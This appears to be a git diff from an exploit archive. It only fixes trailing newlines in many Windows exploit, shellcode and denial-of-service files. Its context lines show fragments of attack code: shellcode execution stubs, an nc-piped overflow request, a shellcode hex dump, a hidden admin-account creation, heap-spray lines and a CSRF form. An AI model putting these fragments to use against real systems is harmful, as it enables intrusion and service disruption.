Metasploit3 < Msf::Exploit::Remote } end -end +end \ No newline at end of file diff --git a/platforms/win_x86/remote/16783.rb b/platforms/win_x86/remote/16783.rb index 7148d29a6..9f56f578b 100755 --- a/platforms/win_x86/remote/16783.rb +++ b/platforms/win_x86/remote/16783.rb @@ -112,5 +112,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end - +end \ No newline at end of file diff --git a/platforms/win_x86/remote/16786.rb b/platforms/win_x86/remote/16786.rb index 8a017214d..4f1074582 100755 --- a/platforms/win_x86/remote/16786.rb +++ b/platforms/win_x86/remote/16786.rb @@ -74,4 +74,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/win_x86/remote/16809.rb b/platforms/win_x86/remote/16809.rb index 8f0796098..1cedc2ec3 100755 --- a/platforms/win_x86/remote/16809.rb +++ b/platforms/win_x86/remote/16809.rb @@ -94,4 +94,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/win_x86/remote/16825.rb b/platforms/win_x86/remote/16825.rb index 1bd6a3285..16e704251 100755 --- a/platforms/win_x86/remote/16825.rb +++ b/platforms/win_x86/remote/16825.rb @@ -85,4 +85,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/win_x86/remote/2680.pm b/platforms/win_x86/remote/2680.pm index d3588db6c..8bf4c64b5 100755 --- a/platforms/win_x86/remote/2680.pm +++ b/platforms/win_x86/remote/2680.pm @@ -121,4 +121,4 @@ sub Exploit 1; -# milw0rm.com [2006-10-29] +# milw0rm.com [2006-10-29] \ No newline at end of file diff --git a/platforms/win_x86/remote/3680.sh b/platforms/win_x86/remote/3680.sh index d5dc25d54..223b12a81 100755 --- a/platforms/win_x86/remote/3680.sh +++ b/platforms/win_x86/remote/3680.sh @@ -129,4 +129,4 @@ echo -ne "GET /1/ldap://ph4nt0m/`perl -e 'print "Ph4nt0m"x5'`\ HTTP/1.0\r\n\ Host: $host\r\n\r\n" | nc -vv $host 80 -# milw0rm.com [2007-04-07] +# milw0rm.com [2007-04-07] \ No newline at end of file diff --git a/platforms/win_x86/remote/3822.c b/platforms/win_x86/remote/3822.c index d30eb2b21..b815bae0e 100755 --- a/platforms/win_x86/remote/3822.c +++ b/platforms/win_x86/remote/3822.c @@ -274,4 +274,4 @@ void usage(char *progname){ exit(0); } -// milw0rm.com [2007-04-30] +// milw0rm.com [2007-04-30] \ No newline at end of file diff --git a/platforms/win_x86/remote/38599.py b/platforms/win_x86/remote/38599.py index 73dc819ba..46a1eaef6 100755 --- a/platforms/win_x86/remote/38599.py +++ b/platforms/win_x86/remote/38599.py @@ -449,4 +449,4 @@ if __name__ == "__main__": sys.exit() -# End of file +# End of file \ No newline at end of file diff --git a/platforms/win_x86/remote/39729.rb b/platforms/win_x86/remote/39729.rb index c35a628a5..09a0b492a 100755 --- a/platforms/win_x86/remote/39729.rb +++ b/platforms/win_x86/remote/39729.rb @@ -65,4 +65,4 @@ def exploit end -end +end \ No newline at end of file diff --git a/platforms/win_x86/remote/4754.pl b/platforms/win_x86/remote/4754.pl index 2f9e2c293..f321df7cc 100755 --- a/platforms/win_x86/remote/4754.pl +++ b/platforms/win_x86/remote/4754.pl @@ -74,4 +74,4 @@ print $socket $attackstring; #close the connection close($socket); -# milw0rm.com [2007-12-18] +# milw0rm.com [2007-12-18] \ No newline at end of file diff --git a/platforms/win_x86/remote/5079.c b/platforms/win_x86/remote/5079.c index 563ca440e..5277ad411 100755 --- a/platforms/win_x86/remote/5079.c +++ b/platforms/win_x86/remote/5079.c @@ -354,4 +354,4 @@ int main(int argc, char* argv[]) return 0; } -// milw0rm.com [2008-02-07] +// milw0rm.com [2008-02-07] \ No newline at end of file diff --git a/platforms/win_x86/remote/5330.c b/platforms/win_x86/remote/5330.c index cdc468c58..641a44f9f 100755 --- a/platforms/win_x86/remote/5330.c +++ b/platforms/win_x86/remote/5330.c @@ -559,4 +559,4 @@ void end_logo() printf(" ####################################################################### \n\n"); } -// milw0rm.com [2008-03-31] +// milw0rm.com [2008-03-31] \ No newline at end of file diff --git a/platforms/win_x86/remote/584.c b/platforms/win_x86/remote/584.c index 72d60a2cd..31cbd63bd 100755 --- a/platforms/win_x86/remote/584.c +++ b/platforms/win_x86/remote/584.c @@ -231,4 +231,4 @@ fp); return 0; } -// milw0rm.com [2004-10-20] +// milw0rm.com [2004-10-20] \ No newline at end of file diff --git a/platforms/win_x86/remote/6100.py b/platforms/win_x86/remote/6100.py index 41cfb05f9..3c6b1ff40 100755 --- a/platforms/win_x86/remote/6100.py +++ b/platforms/win_x86/remote/6100.py @@ -142,4 +142,4 @@ if __name__ == '__main__': # !! This is just for educational purposes, DO NOT use for illegal. !! # -# milw0rm.com [2008-07-18] +# milw0rm.com [2008-07-18] \ No newline at end of file diff --git a/platforms/win_x86/remote/8613.py b/platforms/win_x86/remote/8613.py index 6c2823dea..697b003e2 100755 --- a/platforms/win_x86/remote/8613.py +++ b/platforms/win_x86/remote/8613.py @@ -62,4 +62,4 @@ c.close() raw_input("[+] Done, press enter to quit") s.close() -# milw0rm.com [2009-05-05] +# milw0rm.com [2009-05-05] \ No newline at end of file diff --git a/platforms/win_x86/remote/8614.py b/platforms/win_x86/remote/8614.py index 3cabfdeb5..34c282f0d 100755 --- a/platforms/win_x86/remote/8614.py +++ b/platforms/win_x86/remote/8614.py @@ -55,4 +55,4 @@ c.close() raw_input("[+] Done, press enter to quit") s.close() -# milw0rm.com [2009-05-05] +# milw0rm.com [2009-05-05] \ No newline at end of file diff --git a/platforms/win_x86/remote/8621.py b/platforms/win_x86/remote/8621.py index 56537216f..e26215f6e 100755 --- a/platforms/win_x86/remote/8621.py +++ b/platforms/win_x86/remote/8621.py @@ -66,4 +66,4 @@ c.close() raw_input("[+] Done, press enter to quit") s.close() -# milw0rm.com [2009-05-05] +# milw0rm.com [2009-05-05] \ No newline at end of file diff --git a/platforms/win_x86/remote/8623.rb b/platforms/win_x86/remote/8623.rb index 27685f2b4..3059ffc6e 100755 --- a/platforms/win_x86/remote/8623.rb +++ b/platforms/win_x86/remote/8623.rb @@ -114,4 +114,4 @@ class Metasploit3 < Msf::Exploit::Remote end end -# milw0rm.com [2009-05-07] +# milw0rm.com [2009-05-07] \ No newline at end of file diff --git a/platforms/win_x86/shellcode/13565.asm b/platforms/win_x86/shellcode/13565.asm index d4b0e219d..bc540aaee 100755 --- a/platforms/win_x86/shellcode/13565.asm +++ b/platforms/win_x86/shellcode/13565.asm @@ -63,4 +63,4 @@ call eax ; 00000030 5a 6f 6e 89 e6 56 57 31 c0 b8 40 60 c4 77 ff d0 |Zon..VW1..@`.w..| ; 00000040 31 c0 b8 c5 1e 83 7c ff d0 31 d2 66 89 57 0b 52 |1.....|..1.f.W.R| ; 00000050 68 6f 70 65 6e 89 e2 31 c0 50 50 50 57 52 50 b8 |hopen..1.PPPWRP.| -; 00000060 50 11 a4 7c ff d0 |P..|..| +; 00000060 50 11 a4 7c ff d0 |P..|..| \ No newline at end of file diff --git a/platforms/win_x86/shellcode/13574.c b/platforms/win_x86/shellcode/13574.c index 07182446e..2040d27b5 100755 --- a/platforms/win_x86/shellcode/13574.c +++ b/platforms/win_x86/shellcode/13574.c @@ -29,4 +29,4 @@ ret=(int *)&ret+2; printf("Shellcode Length is : %d\n",strlen(shellcode)); (*ret)=(int)shellcode; return 0; -} +} \ No newline at end of file diff --git a/platforms/win_x86/shellcode/13595.c b/platforms/win_x86/shellcode/13595.c index 07e64f236..2f8b91360 100755 --- a/platforms/win_x86/shellcode/13595.c +++ b/platforms/win_x86/shellcode/13595.c @@ -20,4 +20,4 @@ ret=(int *)&ret+2; printf("Shellcode Length is : %d\n",strlen(shellcode)); (*ret)=(int)shellcode; return 0; -} +} \ No newline at end of file diff --git a/platforms/win_x86/shellcode/13630.c b/platforms/win_x86/shellcode/13630.c index e67a61b53..32fe344d4 100755 --- a/platforms/win_x86/shellcode/13630.c +++ b/platforms/win_x86/shellcode/13630.c @@ -15,7 +15,4 @@ int main(int argc, char **argv) int (*shellcode)(); shellcode = (int (*)()) evil; (int)(*shellcode)(); -} - - - +} \ No newline at end of file diff --git a/platforms/win_x86/shellcode/13631.c b/platforms/win_x86/shellcode/13631.c index 094ca98f9..eda0a91c2 100755 --- a/platforms/win_x86/shellcode/13631.c +++ b/platforms/win_x86/shellcode/13631.c @@ -17,4 +17,4 @@ int main(int argc, char **argv) int (*shellcode)(); shellcode = (int (*)()) evil; (int)(*shellcode)(); -} +} \ No newline at end of file diff --git a/platforms/win_x86/shellcode/13635.txt b/platforms/win_x86/shellcode/13635.txt index 856ca86c9..3461f4ee0 100755 --- a/platforms/win_x86/shellcode/13635.txt +++ b/platforms/win_x86/shellcode/13635.txt @@ -158,5 +158,4 @@ package { var ret1=funcXOR1(); } } -} - +} \ No newline at end of file diff --git a/platforms/win_x86/shellcode/13636.c b/platforms/win_x86/shellcode/13636.c index 439498d79..0971502e8 100755 --- a/platforms/win_x86/shellcode/13636.c +++ b/platforms/win_x86/shellcode/13636.c @@ -161,6 +161,4 @@ return jit; var ret1=funcXOR1(); } } -} - - +} \ No newline at end of file diff --git a/platforms/win_x86/shellcode/13647.txt b/platforms/win_x86/shellcode/13647.txt index 98bf9e292..e41f60f31 100755 --- a/platforms/win_x86/shellcode/13647.txt +++ b/platforms/win_x86/shellcode/13647.txt @@ -6,4 +6,4 @@ In msvcrt.dll at 0x77C01344 We have string ".cmd", that's the trick. Code will work in WinXP SP3 Pro Rus, in other versions you'd better search the string and system(char*) address for yourself. -Coded via lord Kelvin. +Coded via lord Kelvin. \ No newline at end of file diff --git a/platforms/win_x86/shellcode/13699.txt b/platforms/win_x86/shellcode/13699.txt index abfee222b..3b528320b 100755 --- a/platforms/win_x86/shellcode/13699.txt +++ b/platforms/win_x86/shellcode/13699.txt @@ -45,6 +45,4 @@ start: invoke ShellExecute,0,0,addr PATH,0,0,SW_SHOW .endif -end start - - +end start \ No newline at end of file diff --git a/platforms/win_x86/shellcode/14014.pl b/platforms/win_x86/shellcode/14014.pl index d96d4ebbb..049cea069 100755 --- a/platforms/win_x86/shellcode/14014.pl +++ b/platforms/win_x86/shellcode/14014.pl @@ -150,5 +150,4 @@ print q" :s/-` `./s+`/ /dy. "; -} - +} \ No newline at end of file diff --git a/platforms/win_x86/shellcode/14873.asm b/platforms/win_x86/shellcode/14873.asm index cf00c98c8..f5854c28a 100755 --- a/platforms/win_x86/shellcode/14873.asm +++ b/platforms/win_x86/shellcode/14873.asm @@ -54,6 +54,4 @@ jnz calc_chksum_loop ;if it's not equal repeat test_ckksum: cmp al, byte [edx+ecx] ;cmp eax with 1 byte checksum -jnz find_egg ;search for another egg if checksum is bogus - - +jnz find_egg ;search for another egg if checksum is bogus \ No newline at end of file diff --git a/platforms/win_x86/shellcode/15063.c b/platforms/win_x86/shellcode/15063.c index 7282a2e59..75ef6d4fd 100755 --- a/platforms/win_x86/shellcode/15063.c +++ b/platforms/win_x86/shellcode/15063.c @@ -32,4 +32,4 @@ int main(){ return 0; -} +} \ No newline at end of file diff --git a/platforms/win_x86/shellcode/15202.c b/platforms/win_x86/shellcode/15202.c index fd9c6cdf1..964067668 100755 --- a/platforms/win_x86/shellcode/15202.c +++ b/platforms/win_x86/shellcode/15202.c @@ -27,4 +27,4 @@ int main(int argc, char **argv) ((void (*)())code)(); printf("New local admin \tUsername: secuid0\n\t\t\tPassword: m0nk"); return 0; -} +} \ No newline at end of file diff --git a/platforms/win_x86/shellcode/15203.c b/platforms/win_x86/shellcode/15203.c index 87ebfaf09..edcf68096 100755 --- a/platforms/win_x86/shellcode/15203.c +++ b/platforms/win_x86/shellcode/15203.c @@ -38,4 +38,4 @@ int main(int argc, char **argv) ((void (*)())code)(); printf("New local admin \tUsername: secuid0\n\t\t\tPassword: m0nk"); return 0; -} +} \ No newline at end of file diff --git a/platforms/win_x86/shellcode/37758.c b/platforms/win_x86/shellcode/37758.c index e1be57248..3c559fe50 100755 --- a/platforms/win_x86/shellcode/37758.c +++ b/platforms/win_x86/shellcode/37758.c @@ -56,4 +56,4 @@ main(void) ((void (*)(void))shellcode)(); return EXIT_SUCCESS; -} +} \ No newline at end of file diff --git a/platforms/win_x86/shellcode/39754.txt b/platforms/win_x86/shellcode/39754.txt index 062de696a..b005b4e7a 100755 --- a/platforms/win_x86/shellcode/39754.txt +++ b/platforms/win_x86/shellcode/39754.txt @@ -6,5 +6,4 @@ # Tested on: Windows # CVE : (none) -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39754.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39754.zip \ No newline at end of file diff --git a/platforms/win_x86/shellcode/39900.c b/platforms/win_x86/shellcode/39900.c index 42c779539..00557489e 100755 --- a/platforms/win_x86/shellcode/39900.c +++ b/platforms/win_x86/shellcode/39900.c @@ -168,4 +168,4 @@ main() { (* (int(*)()) shellcode)(); -} +} \ No newline at end of file diff --git a/platforms/win_x86/shellcode/39914.c b/platforms/win_x86/shellcode/39914.c index 8d7de0b6f..3e5e091dc 100755 --- a/platforms/win_x86/shellcode/39914.c +++ b/platforms/win_x86/shellcode/39914.c @@ -165,4 +165,4 @@ main() { printf("shellcode length %ld\n",strlen(shellcode)); (* (int(*)()) shellcode)(); -} +} \ No newline at end of file diff --git a/platforms/win_x86/shellcode/40005.c b/platforms/win_x86/shellcode/40005.c index 0779cd475..0724d5c73 100755 --- a/platforms/win_x86/shellcode/40005.c +++ b/platforms/win_x86/shellcode/40005.c @@ -270,4 +270,4 @@ main() { printf("shellcode length %ld\n",(long)strlen(shellcode)); (* (int(*)()) shellcode) (); -} +} \ No newline at end of file diff --git a/platforms/win_x86/shellcode/40094.c b/platforms/win_x86/shellcode/40094.c index abf2e111b..e9604d147 100755 --- a/platforms/win_x86/shellcode/40094.c +++ b/platforms/win_x86/shellcode/40094.c @@ -429,4 +429,4 @@ main() { printf("shellcode length %ld\n",(long)strlen(shellcode)); (* (int(*)()) shellcode) (); -} +} \ No newline at end of file diff --git a/platforms/win_x86/shellcode/40175.c b/platforms/win_x86/shellcode/40175.c index 0d85ec1d7..bc9e7c8cd 100755 --- a/platforms/win_x86/shellcode/40175.c +++ b/platforms/win_x86/shellcode/40175.c @@ -580,4 +580,4 @@ main() printf("shellcode length %ld\n",(unsigned)strlen(shellcode)); (* (int(*)()) shellcode) (); -} +} \ No newline at end of file diff --git a/platforms/win_x86/shellcode/40245.c b/platforms/win_x86/shellcode/40245.c index d265601b9..444a1484c 100755 --- a/platforms/win_x86/shellcode/40245.c +++ b/platforms/win_x86/shellcode/40245.c @@ -270,4 +270,4 @@ main() { printf("shellcode lenght %ld\n",(long)strlen(shellcode)); (* (int(*)()) shellcode) (); -} +} \ No newline at end of file diff --git a/platforms/win_x86/shellcode/40246.c b/platforms/win_x86/shellcode/40246.c index ddfe6c341..c336a2339 100755 --- a/platforms/win_x86/shellcode/40246.c +++ b/platforms/win_x86/shellcode/40246.c @@ -325,4 +325,4 @@ main() { printf("shellcode lenght %ld\n",(long)strlen(shellcode)); (* (int(*)()) shellcode) (); -} +} \ No newline at end of file diff --git a/platforms/win_x86/shellcode/40259.c b/platforms/win_x86/shellcode/40259.c index 3494d3664..08b7ce631 100755 --- a/platforms/win_x86/shellcode/40259.c +++ b/platforms/win_x86/shellcode/40259.c @@ -694,4 +694,4 @@ main() { printf("shellcode lenght %ld\n",(long)strlen(shellcode)); (* (int(*)()) shellcode) (); -} +} \ No newline at end of file diff --git a/platforms/win_x86/shellcode/40334.c b/platforms/win_x86/shellcode/40334.c index db3df7d67..7092b761b 100755 --- a/platforms/win_x86/shellcode/40334.c +++ b/platforms/win_x86/shellcode/40334.c @@ -604,4 +604,4 @@ switch(mode) return 0; -} +} \ No newline at end of file diff --git a/platforms/win_x86/shellcode/40352.c b/platforms/win_x86/shellcode/40352.c index 240ea66f9..e20d2b27c 100755 --- a/platforms/win_x86/shellcode/40352.c +++ b/platforms/win_x86/shellcode/40352.c @@ -516,4 +516,4 @@ switch(mode) return 0; -} +} \ No newline at end of file diff --git a/platforms/win_x86/shellcode/40363.c b/platforms/win_x86/shellcode/40363.c index 278726ea1..59780c6e8 100755 --- a/platforms/win_x86/shellcode/40363.c +++ b/platforms/win_x86/shellcode/40363.c @@ -733,4 +733,4 @@ switch(mode) return 0; -} +} \ No newline at end of file diff --git a/platforms/win_x86/shellcode/41381.c b/platforms/win_x86/shellcode/41381.c index cb879c320..7b2a8995a 100755 --- a/platforms/win_x86/shellcode/41381.c +++ b/platforms/win_x86/shellcode/41381.c @@ -115,7 +115,4 @@ int main(int argc, char const *argv[]) getchar(); return 0; -} - - - +} \ No newline at end of file diff --git a/platforms/win_x86/shellcode/41467.c b/platforms/win_x86/shellcode/41467.c index 9f170e84c..677a129be 100755 --- a/platforms/win_x86/shellcode/41467.c +++ b/platforms/win_x86/shellcode/41467.c @@ -87,4 +87,4 @@ int main(int argc, char **argv) int (*func)(); func = (int (*)()) code; (int)(*func)(); -} +} \ No newline at end of file diff --git a/platforms/win_x86/shellcode/41581.c b/platforms/win_x86/shellcode/41581.c index 21eb47eed..651305b17 100755 --- a/platforms/win_x86/shellcode/41581.c +++ b/platforms/win_x86/shellcode/41581.c @@ -108,6 +108,4 @@ void ExecuteShellcode(){ char* BUFFER = (char*)VirtualAlloc(NULL, sizeof(Shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy(BUFFER, Shellcode, sizeof(Shellcode)); (*(void(*)())BUFFER)(); -} - - +} \ No newline at end of file diff --git a/platforms/win_x86/webapps/15102.txt b/platforms/win_x86/webapps/15102.txt index f63d6aff5..437b598c0 100755 --- a/platforms/win_x86/webapps/15102.txt +++ b/platforms/win_x86/webapps/15102.txt @@ -18,4 +18,4 @@ http://www.site.com/[path]/admin/users.php?do=addnew"> <input type="hidden" name="group" value="1"/> </form> </body> -</html> +</html> \ No newline at end of file diff --git a/platforms/windows/dos/1000.cpp b/platforms/windows/dos/1000.cpp index 2b15fd016..72df5d8a1 100755 --- a/platforms/windows/dos/1000.cpp +++ b/platforms/windows/dos/1000.cpp @@ -240,4 +240,4 @@ WSACleanup(); return EXIT_SUCCESS; } -// milw0rm.com [2005-05-17] +// milw0rm.com [2005-05-17] \ No newline at end of file diff --git a/platforms/windows/dos/10068.rb b/platforms/windows/dos/10068.rb index 2d2bf9bf6..4a8defc0f 100755 --- a/platforms/windows/dos/10068.rb +++ b/platforms/windows/dos/10068.rb @@ -164,4 +164,4 @@ bf87c9d6 894dfc mov dword ptr [ebp-4],ecx bf87c9d9 0f82cf000000 jb win32k!bComputeIDs+0x1be (bf87caae) bf87c9df 8a6702 mov ah,byte ptr [edi+2] <--- the crash above -=end +=end \ No newline at end of file diff --git a/platforms/windows/dos/10073.py b/platforms/windows/dos/10073.py index 50b2e74d4..822fbf0a8 100755 --- a/platforms/windows/dos/10073.py +++ b/platforms/windows/dos/10073.py @@ -44,4 +44,4 @@ else: username=sys.argv[2] passwd=sys.argv[3] start(hostname,username,passwd) - sys.exit(0) + sys.exit(0) \ No newline at end of file diff --git a/platforms/windows/dos/10091.txt b/platforms/windows/dos/10091.txt index 7140ca07d..92142cb48 100755 --- a/platforms/windows/dos/10091.txt +++ b/platforms/windows/dos/10091.txt @@ -108,4 +108,4 @@ sleep(1); ######################################################################## ############# -(PRL-2009-10) +(PRL-2009-10) \ No newline at end of file diff --git a/platforms/windows/dos/10104.py b/platforms/windows/dos/10104.py index 492d61664..9655005a5 100755 --- a/platforms/windows/dos/10104.py +++ b/platforms/windows/dos/10104.py @@ -68,4 +68,4 @@ print "[-] "+ ("DELE "+ test_string +"\r\n") r=sock.recv(1024) print "[+] "+ r -sys.exit(0); +sys.exit(0); \ No newline at end of file diff --git a/platforms/windows/dos/10106.c b/platforms/windows/dos/10106.c index e8dc14084..e53abec99 100755 --- a/platforms/windows/dos/10106.c +++ b/platforms/windows/dos/10106.c @@ -77,6 +77,4 @@ int main() return(0); -} - - +} \ No newline at end of file diff --git a/platforms/windows/dos/10160.py b/platforms/windows/dos/10160.py index 01f033034..7165444f1 100755 --- a/platforms/windows/dos/10160.py +++ b/platforms/windows/dos/10160.py @@ -45,4 +45,4 @@ else: passwd=sys.argv[3] start(hostname,username,passwd) print "[-] Exploit seems to work" - sys.exit(0) + sys.exit(0) \ No newline at end of file diff --git a/platforms/windows/dos/10163.pl b/platforms/windows/dos/10163.pl index 45258d898..30418da1e 100755 --- a/platforms/windows/dos/10163.pl +++ b/platforms/windows/dos/10163.pl @@ -76,4 +76,4 @@ $res = $mechanize->request(HTTP::Request->new('GET', "$login_url")); button => 'Login'); $res2 = $mechanize->request(HTTP::Request->new('GET', "$url")); -$res2 = $mechanize->request(POST "$url", [sadminpwd => $buffer, verifypwd => $buffer]); +$res2 = $mechanize->request(POST "$url", [sadminpwd => $buffer, verifypwd => $buffer]); \ No newline at end of file diff --git a/platforms/windows/dos/10171.py b/platforms/windows/dos/10171.py index 24e57fc65..07d6fd175 100755 --- a/platforms/windows/dos/10171.py +++ b/platforms/windows/dos/10171.py @@ -24,4 +24,4 @@ try: connection.send(request) print i except: - print "Oh! Some Problem Occured Check Server is Running or Not" + print "Oh! Some Problem Occured Check Server is Running or Not" \ No newline at end of file diff --git a/platforms/windows/dos/10176.txt b/platforms/windows/dos/10176.txt index 7e4ff8c5b..ec5b015c0 100755 --- a/platforms/windows/dos/10176.txt +++ b/platforms/windows/dos/10176.txt @@ -463,5 +463,4 @@ Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAksDICYACgkQyNibggitWa2//ACdFpN6SK4B59Iza5Nq88oASfat YhoAn24UcNlJ/lpKv4brl4d6mctKfwMF =cR49 ------END PGP SIGNATURE----- - +-----END PGP SIGNATURE----- \ No newline at end of file diff --git a/platforms/windows/dos/10190.txt b/platforms/windows/dos/10190.txt index 60ee78185..6fce9296b 100755 --- a/platforms/windows/dos/10190.txt +++ b/platforms/windows/dos/10190.txt @@ -214,5 +214,4 @@ int main(void) CloseHandle(pif.hProcess); CloseHandle(pif.hThread); -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/10204.txt b/platforms/windows/dos/10204.txt index f1672d64f..a25360c65 100755 --- a/platforms/windows/dos/10204.txt +++ b/platforms/windows/dos/10204.txt @@ -14,4 +14,4 @@ Foxit Reader is prone to a remote code-execution vulnerability because is fails An attacker can exploit this issue by supplying a malicious PDF file or webpage. Successful exploits may allow the attacker to execute arbitrary code in the context of a user running the affected application. Failed attempts will likely result in denial-of-service conditions. -Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10204.tar (2009-11-22-36668.tar) +Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10204.tar (2009-11-22-36668.tar) \ No newline at end of file diff --git a/platforms/windows/dos/10210.txt b/platforms/windows/dos/10210.txt index 4ecffb012..2edc0b5e5 100755 --- a/platforms/windows/dos/10210.txt +++ b/platforms/windows/dos/10210.txt @@ -33,4 +33,4 @@ for (x=0; x<4000; x++) memory[x] = block + shellcode; </HEAD> <BODY onload="load()"> </BODY> -</HTML> +</HTML> \ No newline at end of file diff --git a/platforms/windows/dos/10221.txt b/platforms/windows/dos/10221.txt index c040bbd09..ad9835484 100755 --- a/platforms/windows/dos/10221.txt +++ b/platforms/windows/dos/10221.txt @@ -115,4 +115,4 @@ else: 2.use a ftp client to reconnect the server for example: -start->run->cmd->ftp 127.0.0.1->*****->*****->dir +start->run->cmd->ftp 127.0.0.1->*****->*****->dir \ No newline at end of file diff --git a/platforms/windows/dos/10223.txt b/platforms/windows/dos/10223.txt index 08b4de8f5..4c069f179 100755 --- a/platforms/windows/dos/10223.txt +++ b/platforms/windows/dos/10223.txt @@ -99,5 +99,4 @@ else: - sys.exit(0); - + sys.exit(0); \ No newline at end of file diff --git a/platforms/windows/dos/1024.html b/platforms/windows/dos/1024.html index b4b22a442..01518cb33 100755 --- a/platforms/windows/dos/1024.html +++ b/platforms/windows/dos/1024.html @@ -4,4 +4,4 @@ function btf(){btf();} btf(); </script> -# milw0rm.com [2005-05-31] +# milw0rm.com [2005-05-31] \ No newline at end of file diff --git a/platforms/windows/dos/1025.html b/platforms/windows/dos/1025.html index a67f7b452..ed8755e50 100755 --- a/platforms/windows/dos/1025.html +++ b/platforms/windows/dos/1025.html @@ -1,3 +1,3 @@ <body onLoad="window()"> -# milw0rm.com [2005-05-31] +# milw0rm.com [2005-05-31] \ No newline at end of file diff --git a/platforms/windows/dos/10257.py b/platforms/windows/dos/10257.py index ab2b07a63..5b81bd250 100755 --- a/platforms/windows/dos/10257.py +++ b/platforms/windows/dos/10257.py @@ -39,5 +39,4 @@ try: ftp.sendcmd(packet) ftp.quit() except ftplib.all_errors, error: - print("Very good, young padawan, but you still have much to learn...") - + print("Very good, young padawan, but you still have much to learn...") \ No newline at end of file diff --git a/platforms/windows/dos/1027.c b/platforms/windows/dos/1027.c index 3473072af..c93584ee7 100755 --- a/platforms/windows/dos/1027.c +++ b/platforms/windows/dos/1027.c @@ -112,4 +112,4 @@ void main(int argc, char *argv[]) WSACleanup(); } -// milw0rm.com [2005-06-02] +// milw0rm.com [2005-06-02] \ No newline at end of file diff --git a/platforms/windows/dos/10303.py b/platforms/windows/dos/10303.py index 89b33071e..9aaefee05 100755 --- a/platforms/windows/dos/10303.py +++ b/platforms/windows/dos/10303.py @@ -24,4 +24,4 @@ try: print("Very good, young padawan, but you still have much to learn...") except: print "Connection error" - sys.exit(1) + sys.exit(1) \ No newline at end of file diff --git a/platforms/windows/dos/10593.txt b/platforms/windows/dos/10593.txt index d054fe179..43bb7595f 100755 --- a/platforms/windows/dos/10593.txt +++ b/platforms/windows/dos/10593.txt @@ -19,4 +19,4 @@ echo $_SERVER["SCRIPT_URI"]."/blah.m3u"; Local M3U: echo "a.m3u" > a.m3u -# OMG WE'RE PWNED: chill, it's not a stack buffer overflow, just a stack overflow. DoS. +# OMG WE'RE PWNED: chill, it's not a stack buffer overflow, just a stack overflow. DoS. \ No newline at end of file diff --git a/platforms/windows/dos/1065.c b/platforms/windows/dos/1065.c index 343c4e141..8275d4c43 100755 --- a/platforms/windows/dos/1065.c +++ b/platforms/windows/dos/1065.c @@ -947,4 +947,4 @@ main ( int argc, char* argv[] ) close ( s2 ); } -// milw0rm.com [2005-06-23] +// milw0rm.com [2005-06-23] \ No newline at end of file diff --git a/platforms/windows/dos/10650.pl b/platforms/windows/dos/10650.pl index 435de2d1e..a1b5a49cf 100755 --- a/platforms/windows/dos/10650.pl +++ b/platforms/windows/dos/10650.pl @@ -16,4 +16,4 @@ print $FILE "$boom"; close($FILE); -print "Done..!~#\n"; +print "Done..!~#\n"; \ No newline at end of file diff --git a/platforms/windows/dos/1067.cpp b/platforms/windows/dos/1067.cpp index 981390b13..aad2593b5 100755 --- a/platforms/windows/dos/1067.cpp +++ b/platforms/windows/dos/1067.cpp @@ -125,4 +125,4 @@ WSACleanup(); return 0; } -// milw0rm.com [2005-06-25] +// milw0rm.com [2005-06-25] \ No newline at end of file diff --git a/platforms/windows/dos/10840.pl b/platforms/windows/dos/10840.pl index e895db0e5..65366d436 100755 --- a/platforms/windows/dos/10840.pl +++ b/platforms/windows/dos/10840.pl @@ -12,4 +12,4 @@ print $FILE "$boom"; close($FILE); -print "Done..!~#\n"; +print "Done..!~#\n"; \ No newline at end of file diff --git a/platforms/windows/dos/10842.py b/platforms/windows/dos/10842.py index 05ae054f4..403c330ac 100755 --- a/platforms/windows/dos/10842.py +++ b/platforms/windows/dos/10842.py @@ -15,4 +15,4 @@ try: file.close(); print "[+] Created mr_me_dos.wav file" except: - print "[-] Error cant write file to systemn"; + print "[-] Error cant write file to systemn"; \ No newline at end of file diff --git a/platforms/windows/dos/1090.cpp b/platforms/windows/dos/1090.cpp index 997edd0af..213bd56da 100755 --- a/platforms/windows/dos/1090.cpp +++ b/platforms/windows/dos/1090.cpp @@ -117,4 +117,4 @@ WSACleanup(); return 0; } -// milw0rm.com [2005-07-06] +// milw0rm.com [2005-07-06] \ No newline at end of file diff --git a/platforms/windows/dos/10902.pl b/platforms/windows/dos/10902.pl index 2101878ab..3c6493886 100755 --- a/platforms/windows/dos/10902.pl +++ b/platforms/windows/dos/10902.pl @@ -15,6 +15,4 @@ $boom="A" x 1000; open(myfile,'>>exploit.nri') || die "Cannot Creat file\n\n"; print myfile $headr; print myfile $boom; -print "Done..!~#\n"; - - +print "Done..!~#\n"; \ No newline at end of file diff --git a/platforms/windows/dos/10904.pl b/platforms/windows/dos/10904.pl index 4c196a3e1..db566a76e 100755 --- a/platforms/windows/dos/10904.pl +++ b/platforms/windows/dos/10904.pl @@ -13,4 +13,4 @@ open(INI,">$file"); print INI $junk; print "[+]File Created Successfully!\n"; print "[+]By Jacky!!!\n"; -close(INI); +close(INI); \ No newline at end of file diff --git a/platforms/windows/dos/10907.pl b/platforms/windows/dos/10907.pl index 5ac0b5678..7dc02af1a 100755 --- a/platforms/windows/dos/10907.pl +++ b/platforms/windows/dos/10907.pl @@ -12,4 +12,4 @@ $boom="A" x 2000; open(myfile,">>$file"); print myfile $boom; close(myfile); -print "Done ..! ~#"; +print "Done ..! ~#"; \ No newline at end of file diff --git a/platforms/windows/dos/10908.pl b/platforms/windows/dos/10908.pl index 0c90aa6ca..2660f004c 100755 --- a/platforms/windows/dos/10908.pl +++ b/platforms/windows/dos/10908.pl @@ -12,4 +12,4 @@ $boom="A" x 2000; open(myfile,">>$file"); print myfile $boom; close(myfile); -print "Done ..! ~#"; +print "Done ..! ~#"; \ No newline at end of file diff 